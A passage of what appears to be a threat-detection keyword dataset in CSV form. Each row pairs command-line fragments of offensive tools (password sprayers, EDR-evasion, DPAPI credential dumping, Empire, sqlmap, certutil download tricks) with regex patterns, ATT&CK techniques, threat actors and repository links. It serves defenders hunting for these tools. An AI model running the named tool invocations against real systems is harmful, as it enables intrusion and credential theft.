- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3617" "* --unhook-method * --dont-unload-driver * --dump-output *",".{0,1000}\s\-\-unhook\-method\s.{0,1000}\s\-\-dont\-unload\-driver\s.{0,1000}\s\-\-dump\-output\s.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","3618" "* UnhookNTDLL.ahk*",".{0,1000}\sUnhookNTDLL\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3619" "* unicorn.py*",".{0,1000}\sunicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","3620" "* --union-char *GsFRts2*",".{0,1000}\s\-\-union\-char\s.{0,1000}GsFRts2.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 
- TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3621" "* unittest.nse*",".{0,1000}\sunittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3622" "* --unregister Kali-Linux*",".{0,1000}\s\-\-unregister\sKali\-Linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","N/A","1","0","N/A","wsl.exe argument kali os","10","10","N/A","N/A","N/A","N/A","3623" "* unusual-port.nse*",".{0,1000}\sunusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3624" "* UPDATE dbo.C2Agents*",".{0,1000}\sUPDATE\sdbo\.C2Agents.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. 
It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3625" "* upload_c2profiles.py*",".{0,1000}\supload_c2profiles\.py.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","N/A","N/A","9","1","N/A","N/A","N/A","N/A","3627" "* upnp-info.nse*",".{0,1000}\supnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3628" "* uptime-agent-info.nse*",".{0,1000}\suptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3629" "* -UrbanBishop -Command *",".{0,1000}\s\-UrbanBishop\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3630" "* --url * --attacker *",".{0,1000}\s\-\-url\s.{0,1000}\s\-\-attacker\s.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","N/A","3","232","43","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z","3631" "* --url --password SIMPLEPASS*",".{0,1000}\s\-\-url\s\-\-password\sSIMPLEPASS.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","3632" "* -urlcache */debase64/*",".{0,1000}\s\-urlcache\s.{0,1000}\/debase64\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","3633" "* url-snarf.nse*",".{0,1000}\surl\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3634" "* Use-DarkHotel*",".{0,1000}\sUse\-DarkHotel.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","3635" "* -user * --passwordlist *",".{0,1000}\s\-user\s.{0,1000}\s\-\-passwordlist\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","3636" "* --user 'nemesis:*",".{0,1000}\s\-\-user\s\'nemesis\:.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3637" "* user pwnd Passw0rd123!*",".{0,1000}\suser\spwnd\sPassw0rd123!.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#windows","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","3638" "* -user userlist.txt -pass passwordlist.txt *",".{0,1000}\s\-user\suserlist\.txt\s\-pass\spasswordlist\.txt\s.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","3639" "* user_persistence_run.c*",".{0,1000}\suser_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","3640" "* --user-as-pass*",".{0,1000}\s\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","3641" "* userenum * --dc *",".{0,1000}\suserenum\s.{0,1000}\s\-\-dc\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3642" "* userenum -d * 
*.txt*",".{0,1000}\suserenum\s\-d\s.{0,1000}\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","3643" "* --UserEnum --Host *",".{0,1000}\s\-\-UserEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","3644" "* -UserList * -Domain * -PasswordList * -OutFile *",".{0,1000}\s\-UserList\s.{0,1000}\s\-Domain\s.{0,1000}\s\-PasswordList\s.{0,1000}\s\-OutFile\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","3645" "* -UserList * -Domain * -PasswordList * -OutFile *",".{0,1000}\s\-UserList\s.{0,1000}\s\-Domain\s.{0,1000}\s\-PasswordList\s.{0,1000}\s\-OutFile\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 
T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","3646" "* -Username * -Hash * -Command *",".{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3647" "* -Username * -Password * -Command * -LogonType *",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Command\s.{0,1000}\s\-LogonType\s.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","3648" "* --UserName * --Password * --Payload 
*.exe*",".{0,1000}\s\-\-UserName\s.{0,1000}\s\-\-Password\s.{0,1000}\s\-\-Payload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","3649" "* -Username * -Password * -Recon -IncludeADFS*",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Recon\s\-IncludeADFS.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","0","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","3650" "* -userpassfile ./userpass_file.txt*",".{0,1000}\s\-userpassfile\s\.\/userpass_file\.txt.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#linux","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","3651" "* --userpassword_list *",".{0,1000}\s\-\-userpassword_list\s.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","3652" "* -UserPersistenceOption 
*",".{0,1000}\s\-UserPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3653" "* --user-spns*",".{0,1000}\s\-\-user\-spns.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP 
queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","3654" "* Use-Waitfor.exe*",".{0,1000}\sUse\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","3655" "* utils.ntlmdecode *",".{0,1000}\sutils\.ntlmdecode\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","3656" "* UUID_bypass.py*",".{0,1000}\sUUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","3657" "* vaporizer.py *",".{0,1000}\svaporizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","3658" "* --var-name=Smukx *",".{0,1000}\s\-\-var\-name\=Smukx\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3659" "* -VaultElementPtr *",".{0,1000}\s\-VaultElementPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3660" "* vaults /target:* /pvk:*",".{0,1000}\svaults\s\/target\:.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","3661" "* vbarandomizer.py*",".{0,1000}\svbarandomizer\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform 
substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3662" "* VeeamHax.exe",".{0,1000}\sVeeamHax\.exe","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3663" "* venomoussway.py*",".{0,1000}\svenomoussway\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3664" "* ventrilo-info.nse*",".{0,1000}\sventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - 